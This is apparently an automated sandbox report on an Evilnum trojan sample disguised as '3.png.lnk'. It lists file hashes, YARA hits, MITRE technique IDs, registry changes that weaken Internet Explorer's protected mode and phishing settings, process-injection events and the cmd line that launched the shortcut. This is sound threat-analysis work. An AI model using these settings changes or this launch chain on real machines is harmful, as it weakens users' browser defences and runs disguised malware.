evilnum | 83f1af96b4a15b3b8ec7490de83555000800779d6456ccd017ba02623704f80c

Analysis

max time kernel
152s
max time network
152s
platform
windows7_x64
resource
win7-en-20211208
submitted
24-01-2022 04:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3.png.lnk
Size

46KB
MD5

12fd4e486b418914dbeedc4effc73426
SHA1

eb046deb4bdf36461bb828967ce15d5123637cee
SHA256

b89cc69c63894c4b263be5a7b7390d3f8500a8ed4834882a7282ebca301e528e
SHA512

302251bedfc04c3b94e6ad6d785aa3623db4b25a05006eca60ef33ab70d6af1a224516deb4c5d33ada0fe2faf2773ca183905c6e65bce2e3fd196ec8beaa2195

Score

10^/10

evilnum trojan

Malware Config

Signatures

EvilNum JS Component 3 IoCs

resource	yara_rule
behavioral3/files/0x000800000001225c-55.dat	evilnum_js
behavioral3/files/0x000600000001263f-57.dat	evilnum_js
behavioral3/files/0x00070000000125f3-59.dat	evilnum_js

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum

Deletes itself 1 IoCs

pid	Process
988	cscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer Automatic Crash Recovery 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Recovery\AutoRecover = "2"	reg.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\PhishingFilter	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV9 = "1"	reg.exe

Modifies Internet Explorer Protected Mode 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3"	reg.exe

Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1"	reg.exe

Modifies Internet Explorer settings 1 TTPs 49 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\Check_Associations = "no"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 4049cf15de10d801	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc9200000000020000000000106600000001000020000000500054f7736d2177550000dfa0661564e1928dfca642f72f3ee685d2b96790d6000000000e80000000020000200000002741b9c9966e848462f382c7ba91a11d54341326e5660f861cbe09200331fd07800200009e94b47f03f4ac00c0c228eda2e20d863c26857d51198945a7ac4b73e47c2fbdcc6658bd5ba8e71543d273eef5c43873f571a1a2a66656f508fed84ba4dbfda5558cf091ac6528e08b95782161cf6e82d4cfc46d51ee4df02e91986e4ee33f83c68afb7e4ab9f5252b16d9265153ae3990efb30db3db188dfe2d9efd6596c633c9a364903a945b3ea94536027b5228a9d032038678cf77011e6d36fc283ff33c8be8eac4255636362a9ebe1862e402f10e93d14431ecf06897ebdd95a964ed74b44af7921721c7596792d1b18aba6e3ff357ceb4e1bbe2f69a5dfc11c20e88ed1b38a8a35e31c0f552bf928f541fb290e8376835427c6410ae9ee62b67e8ee2b67a58140894f4fb281a175780ecc7a9f481ee4c75ad3ab0f02b4472b4188c108b024621ee7b2de6858d6a2a24329e0d3a0d059910fcca077b1b18a4a3320a553ae467f038b4f46ff36826a23b9e17b9dd2e1fa904ec853c72f2c0aa08265b2aa0bd83aa73b9d71f89dd2c09ae2413b77c0a8611bc19115d6f8ce6bfd5b86aa4fdbda5d3cafec08e2bb222fb5cca908be951c92120e1540b5a608099d16a8d4e20c81ff7450fae6260c37f6ed4ecd1e9afc8324b9fce3c4dc9a0147d60c12dc7ce0df896a35b2e3229d7abf5a2f6013eae3aa6ff8bd7fb5a4dd670123ff646e1baecbee83492a381ed9cbb3a15f81c494502c29397440351166129a60444e857ce5f9e27934f470f9edc9a23328533c5a8573a53db433049c00c78f3ddc557df24454d09b221007de7840c704de22879d1204b24c8414b39a7509e95e412d8e3573e329621a3acbb7a1965baf8bc20def8e30f779e9af0b25258f61183f86e7e6fc2bc09fddcb1467a6285a553fc2949e8cf16bbfea6b6deb799b8fc28787542540000000dc75344083924720794628f3fe6a76c607435c72430cbf0124b9a2f7d7de7b4a2d5aedc12210ffbac56d3322a2782569c6a617cd1926416b863020eeb0a4d042	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc9200000000020000000000106600000001000020000000ff028553f7548895853e48ff783e75d3818ed15aa9c2d13697d13a1bb7c4199e000000000e80000000020000200000007538af4b3c397591f253cab40d8121ea3128ca475b6e612efb906a2932b741a380020000fc3816712a8a4351cb696014862be12cdb356c59508afee0b4cbf897e7a26bebe323feec6ce174b2c8e737a92e0e9a3fa5f726c1140b625b2b852f2fad6fcb8984c9216ed1a3e4e0646abc5430276c500085160b60128765a1053800e035eefc63e5f0aba46daf18538e122f680db7f7749f63cc3638bfedea034291b7e2081c2a642683a05bdd5f115851fc3fd9a672b63d7d57a68d5e150a5742a5aab37a3b7490180683af8ec9941096278b05bab7df7f94d9b331a5e7b3fd0580e94f1eb0e164ff4a802c3bc9a8e4b0a335422de27b43316bade7c835ebfc6080927fd5c8f86a63f1f9801daadba549cc7a8e3ecf417cc3c2d903eca348e45614ef103f96be734d5331ac131dacaf7312825875c065fdb43a559d616653ca45bc390517b8c90de6b77f44326e35f4c7394737f9a2b2cf8e983d344a52d19391defe1d08c445655ca9769ff72fd5a6bd0393b7b3216e01873d02771ccd5975240ee3865d9f5f724055b8c71e725d491c76eed84c64f8c6e608472eabc755df2ff8dd347111834587db3b2bb2e29fd2ef6301d748490081efd71de23213db9a3daa378e51c85b3c39e8ac6193321ca27efa223402ca8ad1b7487814899e2ec61f13ccff475263327f8d98783214ae015f0b23029f42ae587f6336cc0519f1830c94acc32c21de3ca4b86b2ab904313d7d5c8cb8ff21749c0b1cd7d90b33658204855bd6f0ec496961471ee418d3055bef8283ae01b24af15c4eedac6d309799972caa5ac8a57da684315ce7ecfad2829612c7309e0ace27c4ccb7054107adf86c36762bc45d8f574c49b481331c66b16761a5a9d9e083d942478fc9a5a746b1a471f5598a77d0683b166a1dfdff25bfe6c8eb79d061d9c44aa7525917bee5aba841e1591d5940000000f3ab062a53f951ecbd4efc4b244ebaed8b7a3847659d6a923abd8c16f26bbd33bfd6c5819b1745df9d7da2c5aa15b36f85c2e347e014d3ba361c71ab4e840292	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Recovery\AutoRecover = "2"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc9200000000020000000000106600000001000020000000a7e8340f3d7d119d751d3e5ac4ab8613269bf679a24588e1a72e9513ffd7fc5a000000000e800000000200002000000030fc36e45aa35ac6aead4d79c6e0dcef9ed5491d7830c60aa5fd37b23ab389b7800200002992d967c3cccb47b97c1cc24ee63f6f8cd2da7e8199ec8d451e868e5a2fbf0d959bf4a93ebc593f716e3d26e9a1bf1091dc37bbeb5d565efc0554749dc1dead2e75c46760018e46ada13b541cfaf8eb65bf002396bd281fbd4798244227c3bc6fe73c8791ff0b3d7ec7ecfbbf1b098bdc8eb1eef5392f45c83a25d9523f387fcf9b8f350169598996583d02d6793b006d2010e83d1b068317a7f0c25a9f093542481217100fd9f96c3c1daf17e4a2276344e622eec8a371c7edb273a99e7d6cd4ee51b0a91d151cd529fe2a4999edab1832f11f06b1801f3eefb245c4933595587cd732ac9748396b7729b33f3e1cf8f36e80979453213793e112dfecd6990f4f6d83f2f2987e1756c238827907da369c775badece688f8580e7434d99fa483df0ba1e3d9f9d629d8bccb6c9b6ad5c84c1d300437844d0996f59a97741bf1261898f06f7cf6748c2a8f62b570d6fb3d7d374f64b69984dd9b375d6b3d19876ca993d07110a1b40b9c8e9e0128563de5673d76f7b2a025b17b30b3003ded244a455d829ff0df234c0365eef497ce74fecd8ca935583bf876310422e5e7cff587cc6095c7fd2af439585cdf21eebfcff06c1d735c7de30a5c5eb5f4e02e2991791e30db418d3c86618c3a5e2aea50d94a72b8976374ccd864d85015f9532f7a06406f5f53ff5e78061323bf0570df041f706e8f4eee430181fc9c253d74c63b9ef8351a7fe32451d0a9542b5ecfca49929889205f71ef028ba9364c10211b331c9b64d95c84af1fea4b9aef927c71bbb02cf56f55e7d1688a563a959d2ecd5bd10b6046c9a508bfb76f59a16b02f8885114b6ebe00fac5159cc5829f42c076de7230b98776256e71a9f4ad55eaeabdf87b1c8a1368242a929d78e8051f46a7d9b400000009215bbac8ce39133937c05f56293974d5480d4e69d8eae8cb637026cb9a2b9e4d78f8de520ceed78a60ffdc55e55f30fbf8e6f0922de11220e6c6dbbf1939a30	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Recovery	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3E3D3311-7CD1-11EC-95C8-4214E09CEA95} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc92000000000200000000001066000000010000200000002428f061ba690c56328405b0d8d43f26af94aaf9b1bb197297dcd7a24d60c26c000000000e80000000020000200000003f313ea1b83c4ffebc4a1d977cf1db4dd8b97ede8a5eeccb2ee2e08b343be0be90000000a7e33b24922c01382ae1bee65fb1fadad59c0a2f2ba9f495c3c788ab6e6145aecd34a00184e73ea5e675d0c08b615df683af247d9e270e988bc944690e285d370d7f39d7e2ba016352d563ba8dd478dea5c4e43ade5b95f73498adcfe9a39380a3c4fc6b757778d56e27b28e129ed1e1a906eb27d54c73b4d51ce37693968289b21b77a334d8e85e80c629c8f1ae78964000000087830e8ab09927ba79c753c891b621fdbe6ba5a1a4af5187f42bda64cc58541bac09dacc464781bf553327cb149099c98952e9c9847991a0e3ae1aef1fcb889a	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc9200000000020000000000106600000001000020000000177911744935e234aecde7664ab6a41f137c2aadff69cbe1c6ea137cc086c079000000000e80000000020000200000004047a305437861e5e9f304cf2e0a9bbf1d3e724306e9e5c59bc6e2329db9ac03800200008e964f4f99a5d0f5bb764b01a757484bf87837264843d1e87eabeb1a87f169d9460dcc2e5f1e4c4a2d5ed622a35e07f5d00e06220cd44207923150489fb91c9d1803d7e43ca2a2f7129c7a11cbe2f3a64d94b76d7bc75e27ac6449f6874cab9a14a9e9b130c61c2384d340c81a6de98c3bfcdf32987d9d5379de83883d210360dca806958d0e906cfe812793f275b529b47c9340e36555cb01065fa51d4a34faaabab4ca0b285cf72e86ec2680e4a257cea04e763c05e882bfa677d2d1ae0d1f7b9bb3fc9992fc43223dac45e876060be58efb9cc1dcfbd11dadaf30593b6cd71f976a33df181055de6f0df224dc5affccf465d355bd6039fa67ea60de07973d9529b7fe639e93698baa3165006e573e0ec1dc6f2338ac32a335ce62feaa9bbadfcb800e0f85862b96e89c26cb4e383e222cf0399be44e941b9bcc8be7cd19e0288381a4f7875d0b82a7bb83043e80047d98af4e70d1f314236e24f57c610b9ee26271c13049f979136f42eff722b125fff11e4a84a426f89901e91cc950b8e42c4be29f93f850608441bad5c4c8e98549113b6569c0a5372be7d00c18cc5b8337da6e21d2d3dc3d1a67b64eea9888a6a8ac221d3f8227486053cd7105ef9f87b8c0999b6f958f479d75171e8630212311956cc045df2ad4c72a8211900dac3b0d97c9d045c85c7cc20b4fd5a7712f2c66ec752bf158ce27e3233f62c1f91d5000983c9fa3f07426af8b3d2762a640ef29141494f7a7e04ecb88285b0c8a7d83655cab77d4ba5b9421d6595b27054e4813cb57d3bc650cab917b555e6985d15bc893bc754fade3db39a3e72fd146e5895c9c5e7500d9500f31eb1be53a8dc02edcb0773a60809eb66c106a72df255350308a802eeb81f861d4148523c4f1524f400000004c144f68b9445152cd8389af2ae1956f6c00847bc29b610c7dfa9be2d5e387ea17bd5b3dac97330932b6d62bbbfd17f21f000849ad8a4ba16775a0eb881e291a	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\IE10RunOncePerInstallCompleted = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc9200000000020000000000106600000001000020000000ee1494986f9578d5cebe01fbdd4b024f3c04dcd20742038270c67b452fa15486000000000e80000000020000200000000239fcc056255b2451ae5a2de5c6e64165698628decde2431d1f1da5785e8d1080020000728b78befda260fa613dd4b0bdb4a7faaee8515217363cbb4118089bb1cdbabc13a9a3ba366ea93e6243cb6f7ede623ac7a2429dd29d4fd8f751dad462d0f83398c9d6dd91df8c87ba5c83e16a35b9eedf4e0bb5cfe1ff6177f5da9d745ee2d5118997cd4929c771224e7809a5f053b0c891e92f0867f013bfec5a15e4a18b3df937c82875bb282053f14e6f191a9e8116b663507a57b5589b8ac36d22fc31be90f776a1c13d1586b158d257f851baf1249179fe71aedcd9dad37e21700b42427b6a47823924b250d51a93e95411b9bb5d1e1f12c4b7ce818e4f91d7ebe8b85ce17d420c146df827e630a4c84a2359d785d6c1fb3183249cf4152800eca8c85201e690fa55f380d2472bd71e296de288073f44acf430ad0d3865037e6eb7c477e326bfd8d016cc2368fe15a4c6281ba580ef776df7a97c4d8fcc45525d18f26c27c272abbe69cf9be2307cc360745391f0a8d3464b7fc641c1d420b4a9569ba29ea96e57b5b1c08f4a3e8187ef8d8649cf6e06cc972f48eedee532ff7ffc4c6d5297ea6fb27345dc727e259ea180926885700509d474927827e7adf3a83fade239ee7018f097f23c01c8181525e1b7f9b43a43afd8f77ab629534944e9a703d46646515e672b40cca5a55c08dfa81d90341807f561d9fc17ed363a7f810a33f4fde2a41acfa424c3e9606ebb797d02e897a4ab9a6c6249a0aa63a1cb576cff66a5e25d8ff32f45471fdd967d79edc5523c05770cb99d33fd6ee099399d771bc2a60bc9c265b7b21fe48453f420a4495452376d2871a43d655c3a1a43857738326791b5dbdfd7fbb43997935e12c4844b6b2ea0e1ef0319f0035b02eec28a1b939c7214404cfdbbc26716031eb4152d8491966d1c1215069da4ddc55ed3fec984400000004b4b7ce58d87c421703169c92244ee0a7250857745d24b6421b99f09357c58075a49d91ba54c12782a0d5402b4fddfeafd3138a0bc096435b19b284fc1c0a905	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc9200000000020000000000106600000001000020000000d511bf65bc34b430fafbc9ef60452f72e46fc87451c24063f791305612ccaac1000000000e8000000002000020000000d61a4565c33b03cd09bed053b002d2cc692c3a0a6fb2ed8af4f1bab488e6b7f880020000b58e7d94fece5bab68590e75c3af6794ba3f21ec535c50d4e93a5fcd9230ee8d6ba54882bac1049b949a7e0930ccea6d367db102428656e5f9d55001803fd5505b7861cc34f30b302f1d97c7c1e31018df2d390289f632da0dc34621cc7af22b23935b5dd5de73aaae55f2f4c77740863abbefaad977af6ea538b0e9421a0130b7590b6e3c9c3be3ed7681504dbe778660f006dfcd64898a5a8abb637d3022366d360d329144b41675803aff03a1ee7203f65d29c586c7070e62603145caec78c029df0e331acde1499955e779d11ede3249f5ccf05077041f6e203c85aa667e1f73b17247993af0c94576583971105dd3ee95956abf4a8e72d5b1f24b13d1f31776571e47daa9ecacdc0688b6f047caa692f5c7f03e3d17471fe15705c0dd3545b75bc6b420cdf1102a040cbe3cc8e4e4ab43fbe15dcb987c0e5d646448173ba7d681f898e682284ba48c965bff72be71f578bb3a964516b65e7181eeceea635d36a46dbf43f9758fa526169d779031eb103a90a4d0ee66c341ecd01b435968eb9583b0f1274ad0ee47c59ebedb24328a6248d12cd5495abe4a75c3243b72b7e68a37929b296b6637b892a9c1fb839cdb6025bc72c88ebf61b021da15766dc6031c17819767cbdf570ae122f48912382fd030412f034e632ea79d8b143cbd23a12a3328a9bbbda6a908fc4d3334e7e3a68d1d22fff2d0beb29e0806367d19ab993fdfa68bb4ce66fb939507e98682eb853f564693c9957047af22541c2aa028333e1c0a9d0e9dc6471faf0c2332067ed8f23b1c5adafcd5454d6fd718ae4be42d46a50adceb5b5000cfd0a9706f0eedfee8098f6c061c9e8bbc9379fb1de2224440fdc554a8606499b4b5f2f4a908a4c8a5d9e65867eb9163b91f9d39abba1640000000fb2e17e9aeb2c5bca7494df003f0d103c6e87eefbb51a51b8b91ec26dfcc2c3e2f934b1834bd7437cbc078fcd197cc6cbb99d730328f23e70f192acd0357984c	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc920000000002000000000010660000000100002000000094a45ab123925ee99de78946140fd82d0e54ffe1255a21d9cdbd488c49d228c4000000000e8000000002000020000000b3dec79e54f897d3ae69b094746988cfd3c8e5cea499a62c07ed688c980e7f5e200000006c17dddcc764fcc8e72fee183d619f668a079ed29ae77157cc6f9ed8c9337e02400000003129bb06c6bb78f9e7aea65646957abaef535155f8a1353e51d53ed86b7416ab2fa26bc6f52381b3b73aa00989c3c47ff00072a10da235f91a0af2ecc9fc6a7d	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000029a8fa03d77d0143b95f148165a5bc92000000000200000000001066000000010000200000002d53824fe926d4902681206c1de606b979aa86c1e5bac039ec95c53015b67283000000000e8000000002000020000000f51cc2a6fed9e8d589586bd7a9646b768ae828ee00c7b9e332b41fda28cf8aa8c001000007fb524689da58b67f34171d4ab8a89f676507d67e62842a0049f059a9944cc8d266e10d42021f8fdcace8b5004733ae73f5d7bca3b8cc95ea230ff11a30bcaf9e8a458ddb48f589b140e68d0040541a1ed72d7c0a99f1df73465a4fc93f77a36486dc80392fba71d2ca8e5ed55648da7555b6820888f9135cc1d5426c981e8fd7e2c2a07eb4490cbe864b6394b8e7900703bf81f1b0bcc0be3f6627297873a5c93c01c3bb2e0863b9f6a5634eb101dd88205ee3633009de52b5445d3501b28088095b17388cd68c844bdd9c5745f46946656c14988e9f5e39591737d7c20e057a2d9fca98cb83dd956d0eda21953b24f3ea43b559ff0e6c0c81c625c0e18c6651b1c8fe52042a3e7c96dd8ee53af5cbcc3532540afe85950a8ecf4e717fdc53049b575dbc6b98d4b9b692867416f269f345ee65be7d85f6b3564711fbaa4f9e741d69345b36b679ad3d898de7600bb6658206e1b88e157361de8721719e86aebbe60b8f822abd2de392b6278cadb29a7edda92d320e820ac7a0e3d68ea7bffdcc7a8d1df3bcc2a34224d058aacccc20edbe99ff3f37c2e96eb25dccbf2396071bd2343d86338c68e2c525b100d219243cca0622026a39c7173064fb81236db540000000202f9b0730dad5be0a0169b6d9b1790da04a329328b43f7a4fbf56a247f3d72fdab2f956a31ef1c0fd79d94220b1735751c8a5a4045b89b0ec1251332b1415de	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "349764855"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
872	cmd.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1744	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1744	iexplore.exe
1744	iexplore.exe
1660	IEXPLORE.EXE
1660	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 1796 wrote to memory of 872	1796	cmd.exe	28
PID 1796 wrote to memory of 872	1796	cmd.exe	28
PID 1796 wrote to memory of 872	1796	cmd.exe	28
PID 872 wrote to memory of 580	872	cmd.exe	29
PID 872 wrote to memory of 580	872	cmd.exe	29
PID 872 wrote to memory of 580	872	cmd.exe	29
PID 872 wrote to memory of 1156	872	cmd.exe	30
PID 872 wrote to memory of 1156	872	cmd.exe	30
PID 872 wrote to memory of 1156	872	cmd.exe	30
PID 872 wrote to memory of 1384	872	cmd.exe	31
PID 872 wrote to memory of 1384	872	cmd.exe	31
PID 872 wrote to memory of 1384	872	cmd.exe	31
PID 872 wrote to memory of 452	872	cmd.exe	32
PID 872 wrote to memory of 452	872	cmd.exe	32
PID 872 wrote to memory of 452	872	cmd.exe	32
PID 872 wrote to memory of 988	872	cmd.exe	33
PID 872 wrote to memory of 988	872	cmd.exe	33
PID 872 wrote to memory of 988	872	cmd.exe	33
PID 988 wrote to memory of 1084	988	cscript.exe	35
PID 988 wrote to memory of 1084	988	cscript.exe	35
PID 988 wrote to memory of 1084	988	cscript.exe	35
PID 1084 wrote to memory of 1656	1084	cscript.exe	37
PID 1084 wrote to memory of 1656	1084	cscript.exe	37
PID 1084 wrote to memory of 1656	1084	cscript.exe	37
PID 1656 wrote to memory of 112	1656	cscript.exe	39
PID 1656 wrote to memory of 112	1656	cscript.exe	39
PID 1656 wrote to memory of 112	1656	cscript.exe	39
PID 1656 wrote to memory of 556	1656	cscript.exe	40
PID 1656 wrote to memory of 556	1656	cscript.exe	40
PID 1656 wrote to memory of 556	1656	cscript.exe	40
PID 1656 wrote to memory of 836	1656	cscript.exe	43
PID 1656 wrote to memory of 836	1656	cscript.exe	43
PID 1656 wrote to memory of 836	1656	cscript.exe	43
PID 1744 wrote to memory of 1660	1744	iexplore.exe	47
PID 1744 wrote to memory of 1660	1744	iexplore.exe	47
PID 1744 wrote to memory of 1660	1744	iexplore.exe	47
PID 1744 wrote to memory of 1660	1744	iexplore.exe	47

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\3.png.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1796
- C:\Windows\System32\cmd.exe
